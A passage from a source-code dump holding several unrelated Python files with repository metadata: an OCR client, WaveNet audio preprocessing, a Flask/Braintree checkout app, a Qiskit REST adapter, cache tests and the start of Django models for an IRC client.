        # iterating it made the loop skip the element after each removal.
        for file in list(unprocessed_files):
            result = download_results(session, output_dir, request_id, file, format_txt, result_logger)
            if result == "PROCESSED":
                download_results(session, output_dir, request_id, file, format_alto, result_logger)
                unprocessed_files.remove(file)

    # Bug fix: this condition was inverted -- it logged the "failed" message
    # exactly when no file had failed, and vice versa.
    if failed_files:
        logger_main.info(f"Processing failed for following files: {failed_files}")
    else:
        logger_main.info("None of the files failed to be processed.")

    finish = time.time()
    total_time = int(finish - start)
    logger_main.info(f"Processing finished, "
                     f"total processing time: {total_time//3600} h,"
                     f"{(total_time%3600)//60} m,"
                     f"{total_time%60} s.")
def create_destination():
    """Create results/<input-name>/{txt,alto} directories.

    Returns:
        The parent path results/<input-name> under which both format
        sub-directories live.
    """
    output_dir = os.path.basename(INPUT_FILE).split(".")[0]
    output_main = "results"
    # Both output formats get identical handling; the original duplicated
    # this stanza once per format, so do it in one loop instead.
    for result_format in ("txt", "alto"):
        output_path = os.path.join(output_main, output_dir, result_format)
        if not os.path.isdir(output_path):
            os.makedirs(output_path)
            logger_main.info(f"{output_path} was successfully created.")
        else:
            logger_main.info(f"{output_path} already exists.")
    return os.path.join(output_main, output_dir)
def post_processing_request(data):
    """Submit *data* for OCR processing.

    Returns:
        The request id reported by the server on success, None otherwise.
    """
    endpoint = SERVER_URL + "post_processing_request"
    reply = requests.post(endpoint, json=data, headers=headers)
    payload = reply.json()
    # Guard clause: anything but an explicit success is logged and rejected.
    if reply.status_code != 200 or payload.get('status') != "success":
        logger_main.error(f"Processing request ended with code {reply.status_code}."
                          f"{payload.get('message')}")
        return None
    request_id = payload.get('request_id')
    logger_main.info(f"Request ID: {request_id}")
    return request_id
def request_status(session, request_id):
    """Return True only when every file in the request reports a PROCESSED state.

    Args:
        session: requests.Session used for the poll.
        request_id: Id returned by post_processing_request.
    """
    url = SERVER_URL + "request_status/" + request_id
    response = session.get(url, headers=headers)
    response_dict = response.json()
    statuses = response_dict.get('request_status').values()
    # Bug fix: the old loop returned after inspecting only the *first* entry,
    # so a multi-file request could be declared done while most files were
    # still being processed. Require every entry to be PROCESSED instead.
    if all('PROCESSED' in value.get('state') for value in statuses):
        return True
    logger_main.info(f"{response.status_code} : {response_dict.get('status')}"
                     f" : {response_dict.get('message')}")
    return False
def download_results(session, output_dir, request_id, file_name, result_format, result_logger):
    """Download one result file of *result_format* for *file_name*.

    Returns:
        The string "PROCESSED" on success, or *file_name* on failure so the
        caller can retry it later.
    """
    source_url = os.path.join(SERVER_URL, "download_results", request_id, file_name, result_format)
    target_path = os.path.join(output_dir, result_format, file_name)
    response = session.get(source_url, headers=headers)
    # Guard clause: log the server's explanation and hand the name back.
    if response.status_code != 200:
        details = response.json()
        result_logger.info(f"{file_name} ended with code {response.status_code} : "
                           f"{details.get('status')} : {details.get('message')}")
        return file_name
    with open(target_path, "w", encoding="utf-8") as result_file:
        result_file.write(response.text)
    result_logger.info(f"{file_name} is processed.")
    return "PROCESSED"
def check_status(session, request_id, file_name):
    """Return the processing state string the server reports for *file_name*."""
    status_url = SERVER_URL + "request_status/" + request_id
    reply = session.get(status_url, headers=headers)
    return reply.json().get('request_status').get(file_name).get('state')
return file_status
main()
| [
"hanka.luk.85@gmail.com"
] | hanka.luk.85@gmail.com |
bb1e5692479370ef21791b709b75e4c5b002a24a | 6e5abad8fd8d089eb8bc5431d226452b5e1c879a | /laughter-c0.py | 6e6a8f0c5dd2f4764c56755a01cd386578395559 | [] | no_license | hirokisince1998/laughter-wavenet | 3f6975ae78aef7277e951129bb7c55fdc1377b9d | 7bb800812cd51d95915766de2230cd37bb503d97 | refs/heads/master | 2023-01-10T18:52:29.517012 | 2020-11-13T10:58:40 | 2020-11-13T10:58:40 | 295,068,440 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,389 | py | from concurrent.futures import ProcessPoolExecutor
from functools import partial
import numpy as np
import os
import audio
from nnmnkwii.io import hts
from nnmnkwii import preprocessing as P
import merlin as fe # <- modified by hiroki
from nnmnkwii.datasets import FileDataSource
from hparams import hparams
from os.path import exists, join
from glob import glob
available_speakers = [ "04_MSY", "06_FWA" ]
from wavenet_vocoder.util import is_mulaw_quantize, is_mulaw, is_raw
def build_from_path(in_dir, out_dir, num_workers=1, tqdm=lambda x: x):
    """Preprocess every utterance found under *in_dir* into *out_dir*.

    Note: ``num_workers`` and ``tqdm`` are kept for interface compatibility
    with the other preprocessing front-ends but are not used here --
    utterances are processed sequentially.

    Returns:
        List of per-utterance metadata tuples from _process_utterance.
    """
    # Removed an unused ProcessPoolExecutor (and its empty futures list) that
    # was created here but never used and never shut down -- it only spawned
    # idle worker processes.
    speakers = available_speakers
    wav_source = WavFileDataSource(in_dir, speakers=speakers)
    mgc_source = MgcFileDataSource(in_dir, speakers=speakers)
    lab_source = TranscriptionFileDataSource(in_dir, speakers=speakers)
    wav_paths = wav_source.collect_files()
    mgc_paths = mgc_source.collect_files()
    lab_paths = lab_source.collect_files()
    # collect_files() fills in the per-file speaker labels as a side effect.
    speaker_ids = wav_source.labels
    binary_dict, continuous_dict = hts.load_question_set(
        join(in_dir, "questions", hparams.question_fn))
    result = []
    for index, (speaker_id, wav_path, mgc_path, lab_path) in enumerate(
            zip(speaker_ids, wav_paths, mgc_paths, lab_paths)):
        result.append(_process_utterance(
            out_dir, index + 1, speaker_id, wav_path, mgc_path, lab_path,
            binary_dict, continuous_dict, "N/A"))
    return result
def _process_utterance(out_dir, index, speaker_id, wav_path, mgc_path, lab_path, binary_dict, continuous_dict, text):
    """Convert one utterance into ``audio-*.npy`` / ``context-*.npy`` files.

    The waveform is optionally rescaled and mu-law encoded; the conditioning
    context is the frame-level linguistic features stacked with a normalized
    c0 track derived from the .mgc file.

    Returns:
        Tuple of (audio_filename, context_filename, timesteps, text, speaker_id).
    """
    # Load the audio to a numpy array. Resampled if needed.
    wav = audio.load_wav(wav_path)

    # The utterance id is the wav file name without its extension.
    wavbn = os.path.basename(wav_path)
    uttID = os.path.splitext(wavbn)[0]

    if hparams.rescaling:
        wav = wav / np.abs(wav).max() * hparams.rescaling_max

    # Encode the waveform according to the configured input type.
    # (Removed the unused ``constant_values`` locals that were computed in
    # every branch but never read.)
    if is_mulaw_quantize(hparams.input_type):
        # [0, quantize_channels)
        out = P.mulaw_quantize(wav, hparams.quantize_channels)
        out_dtype = np.int16
    elif is_mulaw(hparams.input_type):
        # [-1, 1]
        out = P.mulaw(wav, hparams.quantize_channels)
        out_dtype = np.float32
    else:
        # [-1, 1]
        out = wav
        out_dtype = np.float32

    # Frame shift for HTSLabelFile. Despite the variable name, the arithmetic
    # yields units of 100 ns (seconds * 1e7).
    if hparams.frame_shift_ms is None:
        frame_shift_in_micro_sec = (hparams.hop_size * 10000000) // hparams.sample_rate
    else:
        frame_shift_in_micro_sec = hparams.frame_shift_ms * 10000

    # Time-aligned linguistic context, one row per frame.
    labels = hts.HTSLabelFile(frame_shift_in_micro_sec)
    labels.load(lab_path)
    linguistic_features = fe.linguistic_features(
        labels, binary_dict, continuous_dict, add_frame_features=True,
        frame_shift_in_micro_sec=frame_shift_in_micro_sec)

    # Trim the waveform to a whole number of hops.
    Nwav = len(out) // audio.get_hop_size()
    out = out[:Nwav * audio.get_hop_size()]
    timesteps = len(out)

    # Bug fix: the .mgc file contains raw float32 data, but it was opened in
    # text mode and never closed when an exception occurred. Read it in
    # binary mode inside a context manager instead.
    with open(mgc_path, 'rb') as fp:
        mgc = np.fromfile(fp, np.float32, -1) - np.log(32768)
    N = len(mgc) // hparams.num_mels
    mgc = np.reshape(mgc, (N, hparams.num_mels))
    # First mgc coefficient (column 0), mapped through exp -> dB -> normalize.
    c0 = audio._normalize(audio._amp_to_db(np.exp(mgc[0:Nwav, 0:1])))

    # Conditioning context = linguistic features + c0.
    context = np.hstack((linguistic_features, c0))

    # Write both arrays to disk.
    audio_filename = 'audio-' + uttID + '.npy'
    context_filename = 'context-' + uttID + '.npy'
    np.save(os.path.join(out_dir, audio_filename),
            out.astype(out_dtype), allow_pickle=False)
    np.save(os.path.join(out_dir, context_filename),
            context.astype(np.float32), allow_pickle=False)

    # Return a tuple describing this training example.
    return (audio_filename, context_filename, timesteps, text, speaker_id)
class _LaughterBaseDataSource(FileDataSource):
    """Base data source enumerating per-speaker training files of one kind."""

    def __init__(self, data_root, speakers, labelmap, max_files):
        self.data_root = data_root
        self.speakers = speakers
        if labelmap is None:
            # Default: speakers are labeled by their position in the list.
            labelmap = {}
            for idx, speaker in enumerate(speakers):
                labelmap[speaker] = idx
        self.labelmap = labelmap
        # Filled in by collect_files() as a side effect.
        self.labels = None
        self.max_files = max_files

    def collect_files(self, filekind):
        """Collect paths of *filekind* ("wav", "lab" or "mgc") for all speakers.

        Also populates ``self.labels`` with the numeric speaker label of each
        returned path.

        Raises:
            ValueError: If *filekind* is not one of the supported kinds.
        """
        locations = {
            "wav": (join(self.data_root, "training", "wav"), ".wav"),
            "lab": (join(self.data_root, "training", "labels", "full-timealign"), ".lab"),
            "mgc": (join(self.data_root, "training", "mgc"), ".mgc"),
        }
        if filekind not in locations:
            # Bug fix: the old error path printed a message and called
            # sys.exit(1), but ``sys`` is never imported in this module, so
            # it actually died with a NameError. Raise a proper error instead.
            raise ValueError("laughter-c0: unknown file kind: {}".format(filekind))
        root, ext = locations[filekind]
        paths = []
        labels = []
        if self.max_files is None:
            max_files_per_speaker = None
        else:
            max_files_per_speaker = self.max_files // len(self.speakers)
        for idx, speaker in enumerate(self.speakers):
            files = sorted(glob(join(root, speaker, "{}_*{}".format(speaker, ext))))
            files = files[:max_files_per_speaker]
            for f in files:
                paths.append(f)
                labels.append(self.labelmap[self.speakers[idx]])
        self.labels = np.array(labels, dtype=np.int16)
        return paths
class TranscriptionFileDataSource(_LaughterBaseDataSource):
    """Data source for the time-aligned full-context label (.lab) files."""

    def __init__(self, data_root, speakers=available_speakers, labelmap=None, max_files=None):
        base = super(TranscriptionFileDataSource, self)
        base.__init__(data_root, speakers, labelmap, max_files)

    def collect_files(self):
        # Fix the file kind to "lab"; everything else is inherited.
        return super(TranscriptionFileDataSource, self).collect_files("lab")
class WavFileDataSource(_LaughterBaseDataSource):
    """Data source for the training waveform (.wav) files."""

    def __init__(self, data_root, speakers=available_speakers, labelmap=None, max_files=None):
        base = super(WavFileDataSource, self)
        base.__init__(data_root, speakers, labelmap, max_files)

    def collect_files(self):
        # Fix the file kind to "wav"; everything else is inherited.
        return super(WavFileDataSource, self).collect_files("wav")
class MgcFileDataSource(_LaughterBaseDataSource):
    """Data source for the mel-generalized cepstrum (.mgc) files."""

    def __init__(self, data_root, speakers=available_speakers, labelmap=None, max_files=None):
        base = super(MgcFileDataSource, self)
        base.__init__(data_root, speakers, labelmap, max_files)

    def collect_files(self):
        # Fix the file kind to "mgc"; everything else is inherited.
        return super(MgcFileDataSource, self).collect_files("mgc")
| [
"hiroki@speech-lab.org"
] | hiroki@speech-lab.org |
7d2fe8aa23cc9cbade79f992a81703bc13bc26c4 | c38f15738026ea2d1a3597be6dcf502d5a6189a6 | /1-python-power/progBChamaProgA.py | 7496026ad70195b3cc00902cc4e0e0b88e4ab74c | [] | no_license | cassiodamacena/wttd | f3e151e0ebaa56c683f2c136476c50de6900fda3 | ee04e141633cfc59cf51db01bad0a233826402c5 | refs/heads/master | 2023-03-24T10:39:22.355830 | 2021-03-17T00:33:27 | 2021-03-17T00:33:27 | 347,541,905 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 257 | py | print('Begin', __name__)
import progA # Importando progA e já executa o seu código
print('Define fB')
def fA():
print('Dentro fB')
progA.fA() # Chamando agora somente a função fA de progA
print('Chama fB')
fA()
print('End', __name__)
| [
"cassiodamacena@hotmail.com"
] | cassiodamacena@hotmail.com |
bcb26bf70a2bb0b028dff102692d4db3eef4d03d | 7854a7f95864a42d0becadef3ddf77830e4fbe2c | /app.py | 9d7d0219e799abeb74ec3c9457772539db856ceb | [
"MIT"
] | permissive | alex2060/git_traider | 9cc64f889acba9a06daf02e800b7fd126f0a5da5 | 6dd1df327dbb3dc74479246ebb2355f48bad9d78 | refs/heads/main | 2023-08-14T16:59:52.208972 | 2021-09-15T02:35:38 | 2021-09-15T02:35:38 | 406,588,394 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,227 | py | from flask import Flask, redirect, url_for, render_template, request, flash
import os
from os.path import join, dirname
from dotenv import load_dotenv
import braintree
from gateway import generate_client_token, transact, find_transaction
load_dotenv()
import requests
# Requests a new crypto key from the key server and returns it.
def make_qr_code():
    """Ask the key server for a new key; return it as '<name>-<key>'."""
    path = "http://alexhaussmann.com/adhaussmann/a_final/"
    command = "add_key_dev.php?uname=ptest_led&password=pass&email=ReceiverEmail"
    response = requests.get(path + command)
    # Bug fix: ``str(response.content)`` produced the *bytes repr* "b'...'",
    # which left a stray trailing quote on the last space-separated token and
    # thus corrupted the returned key. Use the decoded body instead.
    tokens = response.text.split(" ")
    print(tokens[1] + "-" + tokens[2])
    return tokens[1] + "-" + tokens[2]
def convert(mystuff):
    """Turn a '<name>-<key>' pair into the corresponding output2.php URL."""
    parts = mystuff.split("-")
    base = "http://alexhaussmann.com/adhaussmann/a_final/output2.php"
    return base + "?key=" + parts[1] + "&name=" + parts[0] + "&entery_name=ptest_led"
#myval = make_qr_code()
app = Flask(__name__)
# Secret key signs the session cookie (needed for flash()); set via environment.
app.secret_key = os.environ.get('APP_SECRET_KEY')
# Listening port is configurable via the environment; defaults to 4567.
PORT = int(os.environ.get('PORT', 4567))
# Any of these Braintree transaction states is treated as a successful checkout.
TRANSACTION_SUCCESS_STATUSES = [
    braintree.Transaction.Status.Authorized,
    braintree.Transaction.Status.Authorizing,
    braintree.Transaction.Status.Settled,
    braintree.Transaction.Status.SettlementConfirmed,
    braintree.Transaction.Status.SettlementPending,
    braintree.Transaction.Status.Settling,
    braintree.Transaction.Status.SubmittedForSettlement
]
@app.route('/', methods=['GET'])
def index():
    """Redirect the root URL to the checkout form."""
    return redirect(url_for('new_checkout'))
@app.route('/checkouts/new', methods=['GET'])
def new_checkout():
    """Render the checkout form, seeded with a fresh Braintree client token."""
    client_token = generate_client_token()
    return render_template('checkouts/new.html', client_token=client_token)
@app.route('/checkouts/<transaction_id>', methods=['GET'])
def show_checkout(transaction_id):
    """Show the outcome of one checkout.

    The URL parameter is '<braintree_transaction_id>_<qr_key>'.
    """
    parts = transaction_id.split("_")
    transaction = find_transaction(parts[0])
    if transaction.status in TRANSACTION_SUCCESS_STATUSES:
        result = {
            'header': 'Sweet Success!',
            'icon': 'success',
            'message': 'Your test transaction has been successfully processed. See the Braintree API response and try again.',
            'link': convert(parts[1])
        }
    else:
        result = {
            'header': 'Transaction Failed',
            'icon': 'fail',
            'message': 'Your test transaction has a status of ' + transaction.status + '. See the Braintree API response and try again.',
            'link': ""
        }
    return render_template('checkouts/show.html', transaction=transaction, result=result)
@app.route('/checkouts', methods=['POST'])
def create_checkout():
    """Charge the submitted payment nonce.

    On success (or whenever Braintree returns a transaction object), a fresh
    QR key is generated and appended to the redirect so the result page can
    render the download link; otherwise the errors are flashed.
    """
    result = transact({
        'amount': request.form['amount'],
        'payment_method_nonce': request.form['payment_method_nonce'],
        'options': {
            "submit_for_settlement": True
        }
    })
    if result.is_success or result.transaction:
        # Bug fix: the QR key used to be generated only when
        # ``result.is_success`` was True, so reaching this branch through
        # ``result.transaction`` alone crashed with a NameError on ``val``.
        val = make_qr_code()
        print("in here")
        print(request.form['amount'])
        return redirect(url_for('show_checkout', transaction_id=result.transaction.id + "_" + val))
    for x in result.errors.deep_errors:
        flash('Error: %s: %s' % (x.code, x.message))
    return redirect(url_for('new_checkout'))
if __name__ == '__main__':
    # Bind to all interfaces; debug=True is for local development only and
    # must not be enabled in production.
    app.run(host='0.0.0.0', port=PORT, debug=True)
| [
"alex.haussmann@gmail.com"
] | alex.haussmann@gmail.com |
38989ea3cc2d9323d7df74726b4cbe4770c237d1 | 1d0895269d1d93bab6a0b595c806418b1eeda735 | /qiskit/providers/ibmq/api/rest/experiment.py | 21cea49b8c27b3ce319c61a25cd6e4314e06b812 | [
"Apache-2.0"
] | permissive | Qiskit/qiskit-ibmq-provider | 3921bf5f77a9621013ada7ea5e18fa199470650c | 590f68d9ddb42a45c4ac8a8626ea60da85575b21 | refs/heads/master | 2023-06-08T03:17:52.745052 | 2023-06-05T14:20:16 | 2023-06-05T14:20:16 | 163,192,893 | 240 | 182 | Apache-2.0 | 2023-06-05T14:20:18 | 2018-12-26T15:22:11 | Python | UTF-8 | Python | false | false | 5,218 | py | # This code is part of Qiskit.
#
# (C) Copyright IBM 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Experiment REST adapter."""
import logging
from typing import Dict, Union
from .base import RestAdapterBase
from ..session import RetrySession
logger = logging.getLogger(__name__)
class Experiment(RestAdapterBase):
    """Rest adapter for experiment related endpoints."""

    URL_MAP = {
        'self': '',
        'upload_plots': '/plots'
    }

    def __init__(self, session: RetrySession, experiment_uuid: str, url_prefix: str = '') -> None:
        """Experiment constructor.

        Args:
            session: Session to be used in the adaptor.
            experiment_uuid: UUID of the experiment.
            url_prefix: URL prefix.
        """
        super().__init__(session, '{}/experiments/{}'.format(url_prefix, experiment_uuid))

    def retrieve(self) -> str:
        """Retrieve the specific experiment.

        Returns:
            Experiment data.
        """
        return self.session.get(self.get_url('self')).text

    def update(self, experiment: str) -> Dict:
        """Update the experiment.

        Args:
            experiment: Experiment to update.

        Returns:
            JSON response.
        """
        response = self.session.put(self.get_url('self'), data=experiment,
                                    headers=self._HEADER_JSON_CONTENT)
        return response.json()

    def delete(self) -> Dict:
        """Delete the experiment.

        Returns:
            JSON response.
        """
        return self.session.delete(self.get_url('self')).json()

    def upload_plot(
            self,
            plot: Union[bytes, str],
            plot_name: str,
            sync_upload: bool = True
    ) -> Dict:
        """Upload a plot for the experiment.

        Args:
            plot: Plot file name or data to upload.
            plot_name: Name of the plot.
            sync_upload: Forwarded to the server as the ``x-sync-upload``
                header, which controls whether the server-side upload to
                backend storage blocks this call.

        Returns:
            JSON response.
        """
        url = self.get_url('upload_plots')
        headers = {'x-sync-upload': str(sync_upload)}
        if isinstance(plot, str):
            # A string argument is interpreted as a path to the plot on disk.
            with open(plot, 'rb') as plot_file:
                payload = {'plot': (plot_name, plot_file)}
                return self.session.post(url, files=payload, headers=headers).json()
        payload = {'plot': (plot_name, plot)}  # type: ignore[dict-item]
        return self.session.post(url, files=payload, headers=headers).json()
class ExperimentPlot(RestAdapterBase):
    """Rest adapter for experiment plot related endpoints."""

    URL_MAP = {
        'self': ''
    }

    def __init__(
            self,
            session: RetrySession,
            experiment_uuid: str,
            plot_name: str,
            url_prefix: str = '') -> None:
        """ExperimentPlot constructor.

        Args:
            session: Session to be used in the adaptor.
            experiment_uuid: UUID of the experiment.
            plot_name: Name of the plot.
            url_prefix: URL prefix.
        """
        prefix = '{}/experiments/{}/plots/{}'.format(url_prefix, experiment_uuid, plot_name)
        super().__init__(session, prefix)
        self.plot_name = plot_name

    def retrieve(self) -> bytes:
        """Retrieve the specific experiment plot.

        Returns:
            Plot content.
        """
        return self.session.get(self.get_url('self')).content

    def delete(self) -> None:
        """Delete this experiment plot."""
        self.session.delete(self.get_url('self'))

    def update(
            self,
            plot: Union[bytes, str],
            sync_upload: bool = True
    ) -> Dict:
        """Update an experiment plot.

        Args:
            plot: Plot file name or data to upload.
            sync_upload: Forwarded to the server as the ``x-sync-upload``
                header, which controls whether the server-side upload to
                backend storage blocks this call.

        Returns:
            JSON response.
        """
        url = self.get_url('self')
        headers = {'x-sync-upload': str(sync_upload)}
        if isinstance(plot, str):
            # A string argument is interpreted as a path to the plot on disk.
            with open(plot, 'rb') as plot_file:
                payload = {'plot': (self.plot_name, plot_file)}
                return self.session.put(url, files=payload, headers=headers).json()
        payload = {'plot': (self.plot_name, plot)}  # type: ignore[dict-item]
        return self.session.put(url, files=payload, headers=headers).json()
| [
"noreply@github.com"
] | noreply@github.com |
4dc3fde953d2515b5815da6192706d0acef9283d | cfc1c61117ee215ddcc92667e55e3aacf7dd93e1 | /tests/test_meta_caching.py | 51809e9a5e56050ad7957e6a254f657b0a875393 | [
"Apache-2.0"
] | permissive | REPlegacy/rep | a036f9717e0a460cc492152517aca9d234f509f9 | 0742d8002c48453d4a5a031677c55d75b86c1f76 | refs/heads/master | 2021-06-28T17:10:57.220950 | 2020-09-22T11:53:13 | 2020-09-22T11:53:13 | 157,720,892 | 3 | 0 | NOASSERTION | 2018-11-19T18:17:40 | 2018-11-15T14:03:52 | Jupyter Notebook | UTF-8 | Python | false | false | 3,703 | py | from __future__ import division, print_function, absolute_import
import time
import os.path
import datetime
from sklearn.linear_model import LogisticRegression, LinearRegression, SGDClassifier, SGDRegressor
from rep.metaml._cache import CacheHelper
from rep.metaml.cache import CacheClassifier, CacheRegressor, cache_helper
from rep.test.test_estimators import generate_classification_data, check_classifier, check_regression
__author__ = 'Alex Rogozhnikov'
def test_cache_helper():
    """Storing under the same key overwrites; clearing removes everything."""
    helper = CacheHelper(folder='./.cache/rep', expiration_in_seconds=1000)
    # The second store under the same (name, hash) pair wins.
    helper.store_in_cache('first', 'hash', 24)
    helper.store_in_cache('first', 'hash', 42)
    helper.store_in_cache('second', 'hash', 45)
    assert helper.get_from_cache('first', 'hash') == (True, 42)
    assert helper.get_from_cache('first', 'wrong_hash')[0] == False
    # After clearing, nothing can be found any more.
    helper.clear_cache()
    assert helper.get_from_cache('first', 'hash')[0] == False
    assert helper.get_from_cache('first', 'wrong_hash')[0] == False
    helper.clear_cache()
def _set_cache_files_age(cache, seconds):
    """Rewind atime/mtime of every file in *cache* by *seconds* from now."""
    backdated = datetime.datetime.now() - datetime.timedelta(seconds=seconds)
    timestamp = time.mktime(backdated.timetuple())
    for file_name in os.listdir(cache.folder):
        file_path = os.path.join(cache.folder, file_name)
        os.utime(file_path, (timestamp, timestamp))


def test_cache_expiration(folder='./.cache/rep'):
    """Entries younger than the expiration window are served; older ones are not."""
    cache = CacheHelper(folder=folder, expiration_in_seconds=1000)
    cache.store_in_cache('first', 'hash', 42)
    assert cache.get_from_cache('first', 'hash') == (True, 42)
    # 10 s old: still inside the 1000 s window, should be found.
    _set_cache_files_age(cache, 10)
    assert cache.get_from_cache('first', 'hash') == (True, 42)
    # 2000 s old: beyond the window, must be treated as absent.
    _set_cache_files_age(cache, 2000)
    assert cache.get_from_cache('first', 'hash')[0] == False
    cache.clear_cache()
def test_cache_classifier():
    """Cache hits happen only when name, data, labels, weights and params all match."""
    cache_helper.clear_cache()
    for CacheWrapper, BaseModel in [(CacheClassifier, LogisticRegression), (CacheRegressor, LinearRegression)]:
        X, y, weights = generate_classification_data(n_classes=2)
        estimator = CacheWrapper('first', BaseModel()).fit(X, y)
        assert estimator._used_cache == False
        # An identical second fit must be served from the cache.
        estimator = CacheWrapper('first', BaseModel()).fit(X + 0, y + 0)
        assert estimator._used_cache == True
        # A different cache name misses.
        estimator = CacheWrapper('second', BaseModel()).fit(X, y)
        assert estimator._used_cache == False
        # Changing a single feature value misses.
        X_changed = X.copy()
        X_changed.iloc[0, 0] += 1
        estimator = CacheWrapper('first', BaseModel()).fit(X_changed, y)
        assert estimator._used_cache == False
        # Changing a single label misses.
        y_changed = y.copy()
        y_changed[0] += 1
        estimator = CacheWrapper('first', BaseModel()).fit(X, y_changed)
        assert estimator._used_cache == False
        # Passing sample_weight (even None) changes the cache key.
        estimator = CacheWrapper('first', BaseModel()).fit(X, y, sample_weight=None)
        assert estimator._used_cache == False
        # Different estimator parameters miss.
        estimator = CacheWrapper('first', BaseModel(n_jobs=2)).fit(X, y)
        assert estimator._used_cache == False
        # Fitting the previous setup once again hits, i.e. overwriting worked.
        estimator = CacheWrapper('first', BaseModel(n_jobs=2)).fit(X, y)
        assert estimator._used_cache == True
    cache_helper.clear_cache()
def test_models():
    """Cached estimators pass the generic REP classifier/regressor checks."""
    for _ in range(3):
        cached_clf = CacheClassifier('clf', SGDClassifier(loss='log'))
        check_classifier(cached_clf, has_staged_pp=False, has_importances=False)
        cached_reg = CacheRegressor('reg', SGDRegressor())
        check_regression(cached_reg, has_staged_predictions=False, has_importances=False)
    cache_helper.clear_cache()
| [
"iamfullofspam@gmail.com"
] | iamfullofspam@gmail.com |
b6678a25668c221feec3628a553e9100c77d1646 | 66209a75a7b7416f9f58d41f084bc319c5810f9f | /laconcha/seed.py | 3dc6be1e1fc3abf11324208f1812a9eceff9970c | [] | no_license | ZippeyKeys12/laconcha | 18debf3e5c36280039fba6c9ef31e9b5fa418a0f | 5ec0ad9d534070ba583c3852bb0d73cf4c3ecd67 | refs/heads/master | 2022-12-05T02:57:34.235745 | 2020-08-21T03:09:04 | 2020-08-21T03:09:04 | 275,266,955 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 134 | py | import string
from random import choices
def get_seed(length=32):
    """Return a random hexadecimal seed string.

    Args:
        length: Number of characters in the seed. Defaults to 32, the
            previously hard-coded value, so existing callers are unchanged.
    """
    return ''.join(choices(string.hexdigits, k=length))
class Seed:
    """Placeholder seed type; currently carries no state or behavior."""
    pass
| [
"ZippeyKeys12@gmail.com"
] | ZippeyKeys12@gmail.com |
d4eb63a3ce6955ce6d7e7f559285f4098819a4e2 | 79f541042e4b4d6bb443e7a758ca918817ea0f33 | /Python/23_python.py | f87439711aa00ebf5beeb05135c88dd6cc5d9f1b | [] | no_license | ashutoshm1771/Source-Code-from-Tutorials | d5f950db8f5f648e87303835e9558eeba404939a | f5552d4bd0f4bebcf5c674ff730fcb61f2d7a1ce | refs/heads/master | 2020-09-15T06:08:31.777622 | 2019-11-22T09:08:31 | 2019-11-22T09:08:31 | 223,364,275 | 4 | 0 | null | 2019-11-22T09:01:51 | 2019-11-22T09:01:48 | null | UTF-8 | Python | false | false | 185 | py | fw = open('sample.txt', 'w')
# Write two lines to 'sample.txt', then read the file back and print it.
# Context managers replace the manual open()/close() pairs so the file
# handles are closed even if a write or read raises.
with open('sample.txt', 'w') as fw:
    fw.write('Writing some stuff in my text file\n')
    fw.write('I like bacon\n')

with open('sample.txt', 'r') as fr:
    text = fr.read()

print(text)
"amaanmarfatia@gmail.com"
] | amaanmarfatia@gmail.com |
be022fe3fefde1e08b0c0cafbf8646767f2ba51d | a65103e2f33192d9e6fcf8c8852f263369190175 | /core/models.py | c653f88b69de6db591ec935f5bf162047d706249 | [] | no_license | dhilipsiva/ircman | e23153572d5f8cf09d4ed7d47c47b90050762489 | 767b42f321598b155f2fd74729947ed92f8da160 | refs/heads/master | 2023-07-10T06:42:45.855788 | 2015-07-22T04:17:00 | 2015-07-22T04:17:00 | 35,310,806 | 6 | 0 | null | 2023-09-05T05:15:21 | 2015-05-09T01:58:04 | Python | UTF-8 | Python | false | false | 7,308 | py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# vim: fenc=utf-8
# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4
#
#
"""
File name: models.py
Version: 0.1
Author: dhilipsiva <dhilipsiva@gmail.com>
Date created: 2015-05-09
"""
__author__ = "dhilipsiva"
__status__ = "development"
"""
"""
# Python imports
import datetime
from uuid import uuid4
# Django imports
from django.utils.timezone import utc
from django.contrib.auth.models import AbstractUser
from django.db.models import Model, ForeignKey, DateTimeField, UUIDField, \
CharField, TextField, PositiveIntegerField, BooleanField
def utc_now():
    """
    Return the current time as a timezone-aware datetime in UTC.

    Uses ``datetime.now(tz)`` instead of the deprecated
    ``utcnow().replace(tzinfo=...)`` pattern; the result is equivalent
    (an aware UTC datetime) and no longer depends on django's ``utc`` alias.
    """
    return datetime.datetime.now(datetime.timezone.utc)
class User(AbstractUser):
    """
    A custom user so that we can add permissions easily
    """
    # UUID primary key instead of Django's default auto-increment integer.
    id = UUIDField(primary_key=True, default=uuid4, editable=False)
    # Per-user UUID token; presumably identifies the user's socket session —
    # TODO(review): confirm against the consumers of this field.
    socket = UUIDField(default=uuid4, editable=False)

    class Meta(AbstractUser.Meta):
        abstract = False

    def save(self, *args, **kwargs):
        # Only hash the password when it is not already a pbkdf2_sha256 hash,
        # so re-saving an existing user does not double-hash it.
        if 'pbkdf2_sha256' not in self.password:
            self.set_password(self.password)
        super(User, self).save(*args, **kwargs)

    def to_dict(self, with_sensitive_data=False):
        """
        Dictify user. Email and socket token are included only when
        with_sensitive_data is True.
        """
        d = {
            'id': str(self.id),
            'username': self.username,
            'firstName': self.first_name,
            'lastName': self.last_name,
        }
        if with_sensitive_data:
            d.update({
                'socket': str(self.socket),
                'email': self.email,
            })
        return d

    def __str__(self):
        return self.username

    def __repr__(self):
        return "<User: %s>" % self.__str__()
class Server(Model):
    """A server endpoint (host/port) with its SSL/SASL connection flags."""
    id = UUIDField(primary_key=True, default=uuid4, editable=False)
    host = CharField(max_length=256)
    # 6667 is the conventional default port.
    port = PositiveIntegerField(default=6667, blank=True)
    is_ssl = BooleanField(default=False)
    is_sasl = BooleanField(default=False)

    def to_dict(self):
        """
        Dictify server
        """
        return {
            'id': str(self.id),
            'host': self.host,
            'port': self.port,
            'isSsl': self.is_ssl,
            'isSasl': self.is_sasl,
        }

    def __str__(self):
        return self.host

    def __repr__(self):
        return "<Server: %s>" % self.__str__()
class UserServer(Model):
    """Per-user connection settings (credentials, nick) for one Server."""
    id = UUIDField(primary_key=True, default=uuid4, editable=False)
    user = ForeignKey(User, related_name="user_servers")
    server = ForeignKey(Server, related_name="user_servers")
